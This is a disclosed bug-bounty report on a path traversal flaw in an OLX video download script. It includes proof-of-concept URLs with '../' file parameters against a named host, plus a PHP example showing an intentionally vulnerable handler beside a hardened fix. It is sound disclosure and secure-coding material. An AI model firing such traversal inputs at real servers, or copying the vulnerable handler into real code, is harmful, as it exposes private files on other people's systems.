Arbitrary File Reading

Disclosed: 2016-08-12 15:30:33 By konqi To olx
Unknown
Vulnerability Details
Hi! The script for video downloading doesn't properly filter the input filename, and it's possible to read arbitrary files from the file system.

PoC:
http://makeyourad1.olx.in/converted/final/ready/madeit/download.php?file=download.php
http://makeyourad1.olx.in/converted/final/ready/madeit/download.php?file=../../../../b<<
http://makeyourad1.olx.in/converted/final/ready/madeit/download.php?file=../../../../c<<

Screenshots are attached below.
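For contrast with the bug class described in the report, here is an added example (not OLX's download.php) of a download handler whose `file` parameter is first joined into a path unchecked and then hardened; the base directory, the `.mp4` restriction and the function names are assumptions for illustration.

```php
<?php
// Added example, not the script from the report: a ?file= download
// handler shown in a vulnerable form and a hardened form.
// Assumption: converted videos live under $baseDir and are .mp4 files.

$baseDir = '/var/www/converted/final/ready/madeit';  // assumed location

// VULNERABLE: the user-supplied name is concatenated straight into the
// path, so a value containing ../ segments escapes $baseDir entirely.
function serveFileVulnerable(string $baseDir, string $name): void
{
    readfile($baseDir . '/' . $name);
}

// HARDENED: return a validated absolute path inside $baseDir, or null.
function resolveDownloadPath(string $baseDir, string $name): ?string
{
    // 1. Keep only the last path component; this drops any "../" outright.
    $name = basename($name);
    // 2. Accept only the characters a converted-video filename may contain.
    if (!preg_match('/^[A-Za-z0-9_-]+\.mp4$/', $name)) {
        return null;
    }
    // 3. Canonicalise both sides and require containment. realpath() is
    //    false for a missing file, which is treated as a rejection too.
    $root = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($root === false || $full === false) {
        return null;
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;  // e.g. a symlink that resolves outside $baseDir
    }
    return $full;
}

$path = resolveDownloadPath($baseDir, $_GET['file'] ?? '');
if ($path === null) {
    http_response_code(404);  // same answer for traversal and absent files
    exit;
}
header('Content-Type: video/mp4');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```

The `basename()` step alone would already have stopped the `../../../../` probes in the report; the allowlist and `realpath()` containment check additionally cover symlinks and names such as `download.php` that are inside the directory but were never meant to be served.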
Report Stats
  • Report ID: 150783
  • State: Closed
  • Substate: resolved
  • Upvotes: 10